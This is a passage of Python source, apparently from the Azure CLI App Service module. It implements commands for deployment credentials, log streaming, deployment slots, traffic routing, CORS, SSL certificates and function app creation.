raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot, {"format": "WebDeploy"})
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
if not isinstance(profiles, list):
profiles = [profiles]
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging:
fs_log = None
blob_log = None
level = level if application_logging != 'off' else False
level = True if level is None else level
if application_logging in ['filesystem', 'off']:
fs_log = FileSystemApplicationLogsConfig(level=level)
if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_configuration', slot, site_config)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, preserve_vnet=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
# Default isPreserveVnet to 'True' if preserve_vnet is 'None'
isPreserveVnet = preserve_vnet if preserve_vnet is not None else 'true'
# converstion from string to Boolean
isPreserveVnet = bool(isPreserveVnet == 'true')
CsmSlotEntity = cmd.get_models('CsmSlotEntity')
slot_swap_entity = CsmSlotEntity(target_slot=target_slot or 'production', preserve_vnet=isPreserveVnet)
if action == 'swap':
poller = client.web_apps.begin_swap_slot(resource_group_name, webapp, slot, slot_swap_entity)
return poller
if action == 'preview':
if slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name, webapp, slot_swap_entity)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp, slot, slot_swap_entity)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'begin_list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = get_pool_manager(url)
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
logger.warning(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace')
.rstrip('\n\r')) # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def show_ssl_cert(cmd, resource_group_name, certificate_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.get(resource_group_name, certificate_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
# If in the public cloud, check if certificate is an app service certificate, in the same or a diferent
# subscription
kv_secret_name = None
cloud_type = cmd.cli_ctx.cloud.name
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cmd.cli_ctx)
if cloud_type.lower() == PUBLIC_CLOUD.lower():
if kv_subscription.lower() != subscription_id.lower():
diff_subscription_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_APPSERVICE,
subscription_id=kv_subscription)
ascs = diff_subscription_client.app_service_certificate_orders.list()
else:
ascs = client.app_service_certificate_orders.list()
kv_secret_name = None
for asc in ascs:
if asc.name == key_vault_certificate_name:
kv_secret_name = asc.certificates[key_vault_certificate_name].key_vault_secret_name
# if kv_secret_name is not populated, it is not an appservice certificate, proceed for KV certificates
if not kv_secret_name:
kv_secret_name = key_vault_certificate_name
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=kv_secret_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
# TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
try:
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
except Exception as ex:
poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None
if ex.response.status_code == 202 and poll_url:
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
poll_timeout = time.time() + 60 * 2 # 2 minute timeout
while r.status_code != 200 and time.time() < poll_timeout:
time.sleep(5)
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
if r.status_code == 200:
try:
return r.json()
except ValueError:
return r.text
logger.warning("Managed Certificate creation in progress. Please use the command "
"'az webapp config ssl show -g %s --certificate-name %s' "
" to view your certificate once it is created", resource_group_name, hostname)
return
raise CLIError(ex)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'begin_create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
found_cert = None
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if not found_cert:
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if found_cert:
if len(found_cert.host_names) == 1 and not found_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
found_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(found_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise ResourceNotFoundError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
@staticmethod
def remove_delimiters(runtime):
import re
# delimiters allowed: '|', ':'
if '|' in runtime:
runtime = re.split('[|]', runtime)
elif ':' in runtime:
runtime = re.split('[:]', runtime)
else:
runtime = [runtime]
return '|'.join(filter(None, runtime))
def resolve(self, display_name):
self._load_stacks_hardcoded()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks_hardcoded()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
for k, v in stack['configs'].items():
already_in_appsettings = False
for app_setting in site_config.app_settings:
if app_setting.name == k:
already_in_appsettings = True
app_setting.value = v
if not already_in_appsettings:
site_config.app_settings.append(NameValuePair(name=k, value=v))
return site_config
def _load_stacks_hardcoded(self):
if self._stacks:
return
result = []
if self._linux:
result = get_file_json(RUNTIME_STACKS)['linux']
for r in result:
r['setter'] = _StackRuntimeHelper.update_site_config
else: # Windows stacks
result = get_file_json(RUNTIME_STACKS)['windows']
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack version except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku, number_of_workers=None,
max_burst=None, location=None, tags=None, zone_redundant=False):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_tier(sku)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
if zone_redundant:
_enable_zone_redundant(plan_def, sku_def, number_of_workers)
return client.app_service_plans.begin_create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def create_functionapp(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None, vnet=None, subnet=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 3. In the future, specifying a version will "
"be required. To create a 3.x function you would pass in the flag `--functions-version 3`")
functions_version = '3'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
from azure.mgmt.web.models import Site
SiteConfig, NameValuePair = cmd.get_models('SiteConfig', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
site_config = SiteConfig(app_settings=[])
client = web_client_factory(cmd.cli_ctx)
if vnet or subnet:
if plan:
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
webapp_location = plan_info.location
else:
webapp_location = consumption_plan_location
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
_validate_vnet_integration_location(cmd=cmd, webapp_location=webapp_location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
vnet_sub_id=subnet_info["subnet_subscription_id"])
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
site_config.vnet_route_all_enabled = True
subnet_resource_id = subnet_info["subnet_resource_id"]
else:
subnet_resource_id = None
functionapp_def = Site(location=None, site_config=site_config, tags=tags,
virtual_network_subnet_id=subnet_resource_id)
KEYS = FUNCTIONS_STACKS_API_KEYS()
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
